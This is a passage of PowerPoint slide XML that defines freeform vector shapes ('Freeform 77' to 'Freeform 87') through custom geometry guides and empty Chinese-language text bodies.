              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1104" name="Freeform 77"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1144" y="3197"/>
              <a:ext cx="131" cy="50"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 393"/>
                <a:gd name="T1" fmla="*/ 0 h 149"/>
                <a:gd name="T2" fmla="*/ 0 w 393"/>
                <a:gd name="T3" fmla="*/ 0 h 149"/>
                <a:gd name="T4" fmla="*/ 0 w 393"/>
                <a:gd name="T5" fmla="*/ 0 h 149"/>
                <a:gd name="T6" fmla="*/ 1 w 393"/>
                <a:gd name="T7" fmla="*/ 0 h 149"/>
                <a:gd name="T8" fmla="*/ 2 w 393"/>
                <a:gd name="T9" fmla="*/ 1 h 149"/>
                <a:gd name="T10" fmla="*/ 2 w 393"/>
                <a:gd name="T11" fmla="*/ 1 h 149"/>
                <a:gd name="T12" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1105" name="Freeform 78"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1134" y="3236"/>
              <a:ext cx="144" cy="61"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 434"/>
                <a:gd name="T1" fmla="*/ 1 h 185"/>
                <a:gd name="T2" fmla="*/ 2 w 434"/>
                <a:gd name="T3" fmla="*/ 0 h 185"/>
                <a:gd name="T4" fmla="*/ 1 w 434"/>
                <a:gd name="T5" fmla="*/ 0 h 185"/>
                <a:gd name="T6" fmla="*/ 1 w 434"/>
                <a:gd name="T7" fmla="*/ 0 h 185"/>
                <a:gd name="T8" fmla="*/ 0 w 434"/>
                <a:gd name="T9" fmla="*/ 0 h 185"/>
                <a:gd name="T10" fmla="*/ 0 w 434"/>
                <a:gd name="T11" fmla="*/ 0 h 185"/>
                <a:gd name="T12" fmla="*/ 1 w 434"/>
                <a:gd name="T13" fmla="*/ 0 h 185"/>
                <a:gd name="T14" fmla="*/ 1 w 434"/>
                <a:gd name="T15" fmla="*/ 0 h 185"/>
                <a:gd name="T16" fmla="*/ 2 w 434"/>
                <a:gd name="T17" fmla="*/ 0 h 185"/>
                <a:gd name="T18" fmla="*/ 2 w 434"/>
                <a:gd name="T19" fmla="*/ 0 h 185"/>
                <a:gd name="T20" fmla="*/ 2 w 434"/>
                <a:gd name="T21" fmla="*/ 1 h 185"/>
                <a:gd name="T22" fmla="*/ 2 w 434"/>
                <a:gd name="T23" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1106" name="Freeform 79"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1123" y="3092"/>
              <a:ext cx="179" cy="163"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 538"/>
                <a:gd name="T1" fmla="*/ 2 h 489"/>
                <a:gd name="T2" fmla="*/ 2 w 538"/>
                <a:gd name="T3" fmla="*/ 2 h 489"/>
                <a:gd name="T4" fmla="*/ 1 w 538"/>
                <a:gd name="T5" fmla="*/ 1 h 489"/>
                <a:gd name="T6" fmla="*/ 0 w 538"/>
                <a:gd name="T7" fmla="*/ 1 h 489"/>
                <a:gd name="T8" fmla="*/ 0 w 538"/>
                <a:gd name="T9" fmla="*/ 2 h 489"/>
                <a:gd name="T10" fmla="*/ 0 w 538"/>
                <a:gd name="T11" fmla="*/ 1 h 489"/>
                <a:gd name="T12" fmla="*/ 0 w 538"/>
                <a:gd name="T13" fmla="*/ 1 h 489"/>
                <a:gd name="T14" fmla="*/ 1 w 538"/>
                <a:gd name="T15" fmla="*/ 0 h 489"/>
                <a:gd name="T16" fmla="*/ 1 w 538"/>
                <a:gd name="T17" fmla="*/ 0 h 489"/>
                <a:gd name="T18" fmla="*/ 1 w 538"/>
                <a:gd name="T19" fmla="*/ 0 h 489"/>
                <a:gd name="T20" fmla="*/ 1 w 538"/>
                <a:gd name="T21" fmla="*/ 0 h 489"/>
                <a:gd name="T22" fmla="*/ 2 w 538"/>
                <a:gd name="T23" fmla="*/ 0 h 489"/>
                <a:gd name="T24" fmla="*/ 2 w 538"/>
                <a:gd name="T25" fmla="*/ 1 h 489"/>
                <a:gd name="T26" fmla="*/ 2 w 538"/>
                <a:gd name="T27" fmla="*/ 1 h 489"/>
                <a:gd name="T28" fmla="*/ 2 w 538"/>
                <a:gd name="T29" fmla="*/ 1 h 489"/>
                <a:gd name="T30" fmla="*/ 2 w 538"/>
                <a:gd name="T31" fmla="*/ 1 h 489"/>
                <a:gd name="T32" fmla="*/ 1 w 538"/>
                <a:gd name="T33" fmla="*/ 0 h 489"/>
                <a:gd name="T34" fmla="*/ 1 w 538"/>
                <a:gd name="T35" fmla="*/ 0 h 489"/>
                <a:gd name="T36" fmla="*/ 1 w 538"/>
                <a:gd name="T37" fmla="*/ 0 h 489"/>
                <a:gd name="T38" fmla="*/ 1 w 538"/>
                <a:gd name="T39" fmla="*/ 0 h 489"/>
                <a:gd name="T40" fmla="*/ 1 w 538"/>
                <a:gd name="T41" fmla="*/ 1 h 489"/>
                <a:gd name="T42" fmla="*/ 1 w 538"/>
                <a:gd name="T43" fmla="*/ 1 h 489"/>
                <a:gd name="T44" fmla="*/ 1 w 538"/>
                <a:gd name="T45" fmla="*/ 1 h 489"/>
                <a:gd name="T46" fmla="*/ 1 w 538"/>
                <a:gd name="T47" fmla="*/ 1 h 489"/>
                <a:gd name="T48" fmla="*/ 2 w 538"/>
                <a:gd name="T49" fmla="*/ 2 h 489"/>
                <a:gd name="T50" fmla="*/ 2 w 538"/>
                <a:gd name="T51" fmla="*/ 2 h 489"/>
                <a:gd name="T52" fmla="*/ 2 w 538"/>
                <a:gd name="T53" fmla="*/ 2 h 489"/>
                <a:gd name="T54" fmla="*/ 2 w 538"/>
                <a:gd name="T55" fmla="*/ 2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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1107" name="Freeform 80"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="821" y="3101"/>
              <a:ext cx="197" cy="153"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 590"/>
                <a:gd name="T1" fmla="*/ 1 h 460"/>
                <a:gd name="T2" fmla="*/ 2 w 590"/>
                <a:gd name="T3" fmla="*/ 1 h 460"/>
                <a:gd name="T4" fmla="*/ 2 w 590"/>
                <a:gd name="T5" fmla="*/ 1 h 460"/>
                <a:gd name="T6" fmla="*/ 1 w 590"/>
                <a:gd name="T7" fmla="*/ 0 h 460"/>
                <a:gd name="T8" fmla="*/ 1 w 590"/>
                <a:gd name="T9" fmla="*/ 0 h 460"/>
                <a:gd name="T10" fmla="*/ 1 w 590"/>
                <a:gd name="T11" fmla="*/ 0 h 460"/>
                <a:gd name="T12" fmla="*/ 1 w 590"/>
                <a:gd name="T13" fmla="*/ 0 h 460"/>
                <a:gd name="T14" fmla="*/ 0 w 590"/>
                <a:gd name="T15" fmla="*/ 1 h 460"/>
                <a:gd name="T16" fmla="*/ 0 w 590"/>
                <a:gd name="T17" fmla="*/ 1 h 460"/>
                <a:gd name="T18" fmla="*/ 0 w 590"/>
                <a:gd name="T19" fmla="*/ 1 h 460"/>
                <a:gd name="T20" fmla="*/ 1 w 590"/>
                <a:gd name="T21" fmla="*/ 1 h 460"/>
                <a:gd name="T22" fmla="*/ 1 w 590"/>
                <a:gd name="T23" fmla="*/ 0 h 460"/>
                <a:gd name="T24" fmla="*/ 1 w 590"/>
                <a:gd name="T25" fmla="*/ 0 h 460"/>
                <a:gd name="T26" fmla="*/ 1 w 590"/>
                <a:gd name="T27" fmla="*/ 0 h 460"/>
                <a:gd name="T28" fmla="*/ 1 w 590"/>
                <a:gd name="T29" fmla="*/ 1 h 460"/>
                <a:gd name="T30" fmla="*/ 2 w 590"/>
                <a:gd name="T31" fmla="*/ 1 h 460"/>
                <a:gd name="T32" fmla="*/ 1 w 590"/>
                <a:gd name="T33" fmla="*/ 1 h 460"/>
                <a:gd name="T34" fmla="*/ 1 w 590"/>
                <a:gd name="T35" fmla="*/ 1 h 460"/>
                <a:gd name="T36" fmla="*/ 0 w 590"/>
                <a:gd name="T37" fmla="*/ 2 h 460"/>
                <a:gd name="T38" fmla="*/ 0 w 590"/>
                <a:gd name="T39" fmla="*/ 2 h 460"/>
                <a:gd name="T40" fmla="*/ 0 w 590"/>
                <a:gd name="T41" fmla="*/ 2 h 460"/>
                <a:gd name="T42" fmla="*/ 1 w 590"/>
                <a:gd name="T43" fmla="*/ 1 h 460"/>
                <a:gd name="T44" fmla="*/ 1 w 590"/>
                <a:gd name="T45" fmla="*/ 1 h 460"/>
                <a:gd name="T46" fmla="*/ 2 w 590"/>
                <a:gd name="T47" fmla="*/ 1 h 460"/>
                <a:gd name="T48" fmla="*/ 2 w 590"/>
                <a:gd name="T49" fmla="*/ 2 h 460"/>
                <a:gd name="T50" fmla="*/ 2 w 590"/>
                <a:gd name="T51" fmla="*/ 2 h 460"/>
                <a:gd name="T52" fmla="*/ 2 w 590"/>
                <a:gd name="T53" fmla="*/ 1 h 460"/>
                <a:gd name="T54" fmla="*/ 2 w 590"/>
                <a:gd name="T55" fmla="*/ 1 h 460"/>
                <a:gd name="T56" fmla="*/ 2 w 590"/>
                <a:gd name="T57" fmla="*/ 1 h 460"/>
                <a:gd name="T58" fmla="*/ 2 w 590"/>
                <a:gd name="T59" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1108" name="Freeform 81"/>
            <p:cNvSpPr>
              <a:spLocks/>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1 w 185"/>
                <a:gd name="T9" fmla="*/ 0 h 172"/>
                <a:gd name="T10" fmla="*/ 1 w 185"/>
                <a:gd name="T11" fmla="*/ 0 h 172"/>
                <a:gd name="T12" fmla="*/ 1 w 185"/>
                <a:gd name="T13" fmla="*/ 0 h 172"/>
                <a:gd name="T14" fmla="*/ 1 w 185"/>
                <a:gd name="T15" fmla="*/ 1 h 172"/>
                <a:gd name="T16" fmla="*/ 0 w 185"/>
                <a:gd name="T17" fmla="*/ 1 h 172"/>
                <a:gd name="T18" fmla="*/ 0 w 185"/>
                <a:gd name="T19" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1109" name="Freeform 82"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1160" y="3195"/>
              <a:ext cx="66" cy="45"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 200"/>
                <a:gd name="T1" fmla="*/ 0 h 136"/>
                <a:gd name="T2" fmla="*/ 1 w 200"/>
                <a:gd name="T3" fmla="*/ 0 h 136"/>
                <a:gd name="T4" fmla="*/ 1 w 200"/>
                <a:gd name="T5" fmla="*/ 1 h 136"/>
                <a:gd name="T6" fmla="*/ 0 w 200"/>
                <a:gd name="T7" fmla="*/ 1 h 136"/>
                <a:gd name="T8" fmla="*/ 0 w 200"/>
                <a:gd name="T9" fmla="*/ 0 h 136"/>
                <a:gd name="T10" fmla="*/ 1 w 200"/>
                <a:gd name="T11" fmla="*/ 0 h 136"/>
                <a:gd name="T12" fmla="*/ 0 w 200"/>
                <a:gd name="T13" fmla="*/ 0 h 136"/>
                <a:gd name="T14" fmla="*/ 0 w 200"/>
                <a:gd name="T15" fmla="*/ 0 h 136"/>
                <a:gd name="T16" fmla="*/ 0 w 200"/>
                <a:gd name="T17" fmla="*/ 0 h 136"/>
                <a:gd name="T18" fmla="*/ 1 w 200"/>
                <a:gd name="T19" fmla="*/ 0 h 136"/>
                <a:gd name="T20" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1110" name="Freeform 83"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="454" y="3237"/>
              <a:ext cx="443" cy="238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 1330"/>
                <a:gd name="T1" fmla="*/ 0 h 714"/>
                <a:gd name="T2" fmla="*/ 0 w 1330"/>
                <a:gd name="T3" fmla="*/ 0 h 714"/>
                <a:gd name="T4" fmla="*/ 0 w 1330"/>
                <a:gd name="T5" fmla="*/ 1 h 714"/>
                <a:gd name="T6" fmla="*/ 0 w 1330"/>
                <a:gd name="T7" fmla="*/ 1 h 714"/>
                <a:gd name="T8" fmla="*/ 1 w 1330"/>
                <a:gd name="T9" fmla="*/ 1 h 714"/>
                <a:gd name="T10" fmla="*/ 1 w 1330"/>
                <a:gd name="T11" fmla="*/ 1 h 714"/>
                <a:gd name="T12" fmla="*/ 4 w 1330"/>
                <a:gd name="T13" fmla="*/ 2 h 714"/>
                <a:gd name="T14" fmla="*/ 5 w 1330"/>
                <a:gd name="T15" fmla="*/ 3 h 714"/>
                <a:gd name="T16" fmla="*/ 5 w 1330"/>
                <a:gd name="T17" fmla="*/ 3 h 714"/>
                <a:gd name="T18" fmla="*/ 2 w 1330"/>
                <a:gd name="T19" fmla="*/ 1 h 714"/>
                <a:gd name="T20" fmla="*/ 2 w 1330"/>
                <a:gd name="T21" fmla="*/ 1 h 714"/>
                <a:gd name="T22" fmla="*/ 2 w 1330"/>
                <a:gd name="T23" fmla="*/ 1 h 714"/>
                <a:gd name="T24" fmla="*/ 1 w 1330"/>
                <a:gd name="T25" fmla="*/ 0 h 714"/>
                <a:gd name="T26" fmla="*/ 1 w 1330"/>
                <a:gd name="T27" fmla="*/ 0 h 714"/>
                <a:gd name="T28" fmla="*/ 1 w 1330"/>
                <a:gd name="T29" fmla="*/ 0 h 714"/>
                <a:gd name="T30" fmla="*/ 1 w 1330"/>
                <a:gd name="T31" fmla="*/ 1 h 714"/>
                <a:gd name="T32" fmla="*/ 1 w 1330"/>
                <a:gd name="T33" fmla="*/ 1 h 714"/>
                <a:gd name="T34" fmla="*/ 0 w 1330"/>
                <a:gd name="T35" fmla="*/ 0 h 714"/>
                <a:gd name="T36" fmla="*/ 1 w 1330"/>
                <a:gd name="T37" fmla="*/ 0 h 714"/>
                <a:gd name="T38" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1111" name="Freeform 84"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="510" y="3225"/>
              <a:ext cx="407" cy="239"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 5 w 1220"/>
                <a:gd name="T1" fmla="*/ 3 h 716"/>
                <a:gd name="T2" fmla="*/ 1 w 1220"/>
                <a:gd name="T3" fmla="*/ 1 h 716"/>
                <a:gd name="T4" fmla="*/ 1 w 1220"/>
                <a:gd name="T5" fmla="*/ 0 h 716"/>
                <a:gd name="T6" fmla="*/ 1 w 1220"/>
                <a:gd name="T7" fmla="*/ 0 h 716"/>
                <a:gd name="T8" fmla="*/ 1 w 1220"/>
                <a:gd name="T9" fmla="*/ 0 h 716"/>
                <a:gd name="T10" fmla="*/ 0 w 1220"/>
                <a:gd name="T11" fmla="*/ 0 h 716"/>
                <a:gd name="T12" fmla="*/ 0 w 1220"/>
                <a:gd name="T13" fmla="*/ 0 h 716"/>
                <a:gd name="T14" fmla="*/ 1 w 1220"/>
                <a:gd name="T15" fmla="*/ 0 h 716"/>
                <a:gd name="T16" fmla="*/ 1 w 1220"/>
                <a:gd name="T17" fmla="*/ 0 h 716"/>
                <a:gd name="T18" fmla="*/ 1 w 1220"/>
                <a:gd name="T19" fmla="*/ 1 h 716"/>
                <a:gd name="T20" fmla="*/ 1 w 1220"/>
                <a:gd name="T21" fmla="*/ 1 h 716"/>
                <a:gd name="T22" fmla="*/ 1 w 1220"/>
                <a:gd name="T23" fmla="*/ 1 h 716"/>
                <a:gd name="T24" fmla="*/ 5 w 1220"/>
                <a:gd name="T25" fmla="*/ 3 h 716"/>
                <a:gd name="T26" fmla="*/ 5 w 1220"/>
                <a:gd name="T27" fmla="*/ 3 h 716"/>
                <a:gd name="T28" fmla="*/ 5 w 1220"/>
                <a:gd name="T29" fmla="*/ 3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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1112" name="Freeform 85"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="432" y="3235"/>
              <a:ext cx="457" cy="247"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 6 w 1371"/>
                <a:gd name="T1" fmla="*/ 3 h 741"/>
                <a:gd name="T2" fmla="*/ 5 w 1371"/>
                <a:gd name="T3" fmla="*/ 3 h 741"/>
                <a:gd name="T4" fmla="*/ 5 w 1371"/>
                <a:gd name="T5" fmla="*/ 3 h 741"/>
                <a:gd name="T6" fmla="*/ 5 w 1371"/>
                <a:gd name="T7" fmla="*/ 3 h 741"/>
                <a:gd name="T8" fmla="*/ 5 w 1371"/>
                <a:gd name="T9" fmla="*/ 3 h 741"/>
                <a:gd name="T10" fmla="*/ 4 w 1371"/>
                <a:gd name="T11" fmla="*/ 2 h 741"/>
                <a:gd name="T12" fmla="*/ 4 w 1371"/>
                <a:gd name="T13" fmla="*/ 2 h 741"/>
                <a:gd name="T14" fmla="*/ 4 w 1371"/>
                <a:gd name="T15" fmla="*/ 2 h 741"/>
                <a:gd name="T16" fmla="*/ 4 w 1371"/>
                <a:gd name="T17" fmla="*/ 2 h 741"/>
                <a:gd name="T18" fmla="*/ 3 w 1371"/>
                <a:gd name="T19" fmla="*/ 2 h 741"/>
                <a:gd name="T20" fmla="*/ 3 w 1371"/>
                <a:gd name="T21" fmla="*/ 2 h 741"/>
                <a:gd name="T22" fmla="*/ 3 w 1371"/>
                <a:gd name="T23" fmla="*/ 2 h 741"/>
                <a:gd name="T24" fmla="*/ 3 w 1371"/>
                <a:gd name="T25" fmla="*/ 2 h 741"/>
                <a:gd name="T26" fmla="*/ 2 w 1371"/>
                <a:gd name="T27" fmla="*/ 2 h 741"/>
                <a:gd name="T28" fmla="*/ 2 w 1371"/>
                <a:gd name="T29" fmla="*/ 1 h 741"/>
                <a:gd name="T30" fmla="*/ 2 w 1371"/>
                <a:gd name="T31" fmla="*/ 1 h 741"/>
                <a:gd name="T32" fmla="*/ 2 w 1371"/>
                <a:gd name="T33" fmla="*/ 2 h 741"/>
                <a:gd name="T34" fmla="*/ 2 w 1371"/>
                <a:gd name="T35" fmla="*/ 1 h 741"/>
                <a:gd name="T36" fmla="*/ 1 w 1371"/>
                <a:gd name="T37" fmla="*/ 1 h 741"/>
                <a:gd name="T38" fmla="*/ 1 w 1371"/>
                <a:gd name="T39" fmla="*/ 1 h 741"/>
                <a:gd name="T40" fmla="*/ 0 w 1371"/>
                <a:gd name="T41" fmla="*/ 1 h 741"/>
                <a:gd name="T42" fmla="*/ 0 w 1371"/>
                <a:gd name="T43" fmla="*/ 0 h 741"/>
                <a:gd name="T44" fmla="*/ 0 w 1371"/>
                <a:gd name="T45" fmla="*/ 0 h 741"/>
                <a:gd name="T46" fmla="*/ 1 w 1371"/>
                <a:gd name="T47" fmla="*/ 0 h 741"/>
                <a:gd name="T48" fmla="*/ 0 w 1371"/>
                <a:gd name="T49" fmla="*/ 0 h 741"/>
                <a:gd name="T50" fmla="*/ 0 w 1371"/>
                <a:gd name="T51" fmla="*/ 1 h 741"/>
                <a:gd name="T52" fmla="*/ 0 w 1371"/>
                <a:gd name="T53" fmla="*/ 1 h 741"/>
                <a:gd name="T54" fmla="*/ 0 w 1371"/>
                <a:gd name="T55" fmla="*/ 1 h 741"/>
                <a:gd name="T56" fmla="*/ 1 w 1371"/>
                <a:gd name="T57" fmla="*/ 2 h 741"/>
                <a:gd name="T58" fmla="*/ 1 w 1371"/>
                <a:gd name="T59" fmla="*/ 2 h 741"/>
                <a:gd name="T60" fmla="*/ 2 w 1371"/>
                <a:gd name="T61" fmla="*/ 2 h 741"/>
                <a:gd name="T62" fmla="*/ 2 w 1371"/>
                <a:gd name="T63" fmla="*/ 2 h 741"/>
                <a:gd name="T64" fmla="*/ 6 w 1371"/>
                <a:gd name="T65" fmla="*/ 3 h 741"/>
                <a:gd name="T66" fmla="*/ 6 w 1371"/>
                <a:gd name="T67" fmla="*/ 3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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1113" name="Freeform 86"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="876" y="3422"/>
              <a:ext cx="366" cy="75"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 5 w 1099"/>
                <a:gd name="T1" fmla="*/ 0 h 225"/>
                <a:gd name="T2" fmla="*/ 4 w 1099"/>
                <a:gd name="T3" fmla="*/ 0 h 225"/>
                <a:gd name="T4" fmla="*/ 4 w 1099"/>
                <a:gd name="T5" fmla="*/ 0 h 225"/>
                <a:gd name="T6" fmla="*/ 4 w 1099"/>
                <a:gd name="T7" fmla="*/ 1 h 225"/>
                <a:gd name="T8" fmla="*/ 4 w 1099"/>
                <a:gd name="T9" fmla="*/ 0 h 225"/>
                <a:gd name="T10" fmla="*/ 3 w 1099"/>
                <a:gd name="T11" fmla="*/ 0 h 225"/>
                <a:gd name="T12" fmla="*/ 2 w 1099"/>
                <a:gd name="T13" fmla="*/ 0 h 225"/>
                <a:gd name="T14" fmla="*/ 1 w 1099"/>
                <a:gd name="T15" fmla="*/ 0 h 225"/>
                <a:gd name="T16" fmla="*/ 0 w 1099"/>
                <a:gd name="T17" fmla="*/ 1 h 225"/>
                <a:gd name="T18" fmla="*/ 0 w 1099"/>
                <a:gd name="T19" fmla="*/ 1 h 225"/>
                <a:gd name="T20" fmla="*/ 1 w 1099"/>
                <a:gd name="T21" fmla="*/ 0 h 225"/>
                <a:gd name="T22" fmla="*/ 2 w 1099"/>
                <a:gd name="T23" fmla="*/ 0 h 225"/>
                <a:gd name="T24" fmla="*/ 3 w 1099"/>
                <a:gd name="T25" fmla="*/ 0 h 225"/>
                <a:gd name="T26" fmla="*/ 4 w 1099"/>
                <a:gd name="T27" fmla="*/ 0 h 225"/>
                <a:gd name="T28" fmla="*/ 4 w 1099"/>
                <a:gd name="T29" fmla="*/ 0 h 225"/>
                <a:gd name="T30" fmla="*/ 5 w 1099"/>
                <a:gd name="T31" fmla="*/ 0 h 225"/>
                <a:gd name="T32" fmla="*/ 5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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1114" name="Freeform 87"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="693" y="2847"/>
              <a:ext cx="977" cy="406"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 2930"/>
                <a:gd name="T1" fmla="*/ 2 h 1217"/>
                <a:gd name="T2" fmla="*/ 0 w 2930"/>
                <a:gd name="T3" fmla="*/ 1 h 1217"/>
                <a:gd name="T4" fmla="*/ 0 w 2930"/>
                <a:gd name="T5" fmla="*/ 1 h 1217"/>
                <a:gd name="T6" fmla="*/ 1 w 2930"/>
                <a:gd name="T7" fmla="*/ 0 h 1217"/>
                <a:gd name="T8" fmla="*/ 3 w 2930"/>
                <a:gd name="T9" fmla="*/ 0 h 1217"/>
                <a:gd name="T10" fmla="*/ 5 w 2930"/>
                <a:gd name="T11" fmla="*/ 0 h 1217"/>
                <a:gd name="T12" fmla="*/ 7 w 2930"/>
                <a:gd name="T13" fmla="*/ 0 h 1217"/>
                <a:gd name="T14" fmla="*/ 9 w 2930"/>
                <a:gd name="T15" fmla="*/ 0 h 1217"/>
                <a:gd name="T16" fmla="*/ 10 w 2930"/>
                <a:gd name="T17" fmla="*/ 1 h 1217"/>
                <a:gd name="T18" fmla="*/ 11 w 2930"/>
                <a:gd name="T19" fmla="*/ 2 h 1217"/>
                <a:gd name="T20" fmla="*/ 11 w 2930"/>
                <a:gd name="T21" fmla="*/ 3 h 1217"/>
                <a:gd name="T22" fmla="*/ 12 w 2930"/>
                <a:gd name="T23" fmla="*/ 3 h 1217"/>
                <a:gd name="T24" fmla="*/ 12 w 2930"/>
                <a:gd name="T25" fmla="*/ 4 h 1217"/>
                <a:gd name="T26" fmla="*/ 12 w 2930"/>
                <a:gd name="T27" fmla="*/ 4 h 1217"/>
                <a:gd name="T28" fmla="*/ 11 w 2930"/>
                <a:gd name="T29" fmla="*/ 5 h 1217"/>
                <a:gd name="T30" fmla="*/ 11 w 2930"/>
                <a:gd name="T31" fmla="*/ 5 h 1217"/>
                <a:gd name="T32" fmla="*/ 11 w 2930"/>
                <a:gd name="T33" fmla="*/ 4 h 1217"/>
                <a:gd name="T34" fmla="*/ 10 w 2930"/>
                <a:gd name="T35" fmla="*/ 4 h 1217"/>
                <a:gd name="T36" fmla="*/ 10 w 2930"/>
                <a:gd name="T37" fmla="*/ 4 h 1217"/>
                <a:gd name="T38" fmla="*/ 10 w 2930"/>
                <a:gd name="T39" fmla="*/ 4 h 1217"/>
                <a:gd name="T40" fmla="*/ 10 w 2930"/>
                <a:gd name="T41" fmla="*/ 4 h 1217"/>
                <a:gd name="T42" fmla="*/ 11 w 2930"/>
